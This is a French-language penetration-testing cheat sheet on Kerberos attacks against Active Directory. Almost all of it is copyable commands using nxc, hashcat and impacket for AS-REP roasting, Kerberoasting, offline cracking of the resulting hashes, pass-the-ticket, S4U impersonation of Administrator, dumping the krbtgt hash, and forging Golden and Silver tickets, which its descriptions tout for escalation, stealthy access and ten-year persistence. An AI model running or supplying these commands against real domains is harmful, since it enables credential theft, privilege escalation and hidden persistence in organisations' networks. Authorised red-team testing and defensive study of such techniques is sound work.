Exploitation

Kerberos Attacks

AS-REP, Kerberoasting, Pass-the-Ticket et tickets forgés pour escalade ou persistance.

AS-REP Roasting

Copy command
nxc ldap $DC -u '' -p '' --asreproast /tmp/asrep.txt

Description: AS-REP roasting sans creds si null session dispo : identifie les comptes sans pré-auth.

Copy command
nxc ldap $DC -u $USER -p $PASS --asreproast /tmp/asrep.txt

Description: Collecte AS-REP avec creds : plus fiable, tous les comptes vulnérables remontés.

Copy command
gf ldap -t $DC -u $USER -p $PASS --asreproast

Description: Alternative GoFenrir : même résultat, format identique pour hashcat.

Copy command
hashcat -m 18200 /tmp/asrep.txt $WORDLIST

Description: Crack offline des hash AS-REP (mode 18200 = Kerberos 5 AS-REP etype 23).

Kerberoasting

Copy command
nxc ldap $DC -u $USER -p $PASS --kerberoasting /tmp/kerb.txt

Description: Extraire les TGS de tous les comptes avec SPN : crack offline vers mot de passe en clair.

Copy command
gf ldap -t $DC -u $USER -p $PASS --kerberoastable

Description: Lister les comptes SPN sans les extraire, pour triage avant action.

Copy command
hashcat -m 13100 /tmp/kerb.txt $WORDLIST

Description: Crack TGS RC4-HMAC (mode 13100). Préférer cibler les comptes de service métier.

Copy command
hashcat -m 19700 /tmp/kerb.txt $WORDLIST

Description: Mode 19700 pour TGS AES256 si RC4 désactivé sur le compte.

Pass-the-Ticket

Copy command
getTGT.py $DOMAIN/$USER:$PASS

Description: Obtenir un TGT valide pour l'utilisateur courant via impacket.

Copy command
export KRB5CCNAME=$USER.ccache

Description: Définir le ticket actif dans la variable d'env pour les outils impacket et nxc.

Copy command
nxc smb $TARGET -u $USER -p '' --use-kcache

Description: Authentification Kerberos depuis le ccache : pas de hash ni de mot de passe envoyé.

Copy command
getST.py -k -no-pass -impersonate Administrator -spn cifs/$TARGET.$DOMAIN $DOMAIN/$USER$:$PASS

Description: S4U2Proxy : impersonner un compte via un service account avec délégation.

Golden & Silver Ticket

Copy command
secretsdump.py $DOMAIN/$USER:$PASS@$DC -just-dc-user krbtgt

Description: Extraire le hash krbtgt : requis pour forger un Golden Ticket (post-DA).

Copy command
ticketer.py -nthash $KRBTGT_HASH -domain-sid $DOMAIN_SID -domain $DOMAIN Administrator

Description: Forger un Golden Ticket Administrator : valide 10 ans par défaut, persistance maximale.

Copy command
secretsdump.py $DOMAIN/$USER:$PASS@$TARGET -just-dc

Description: Extraire le hash machine cible : nécessaire pour un Silver Ticket ciblé.

Copy command
ticketer.py -nthash $MACHINE_HASH -domain-sid $DOMAIN_SID -domain $DOMAIN -spn cifs/$TARGET Administrator

Description: Silver Ticket pour accès discret à un service précis sans passer par le KDC.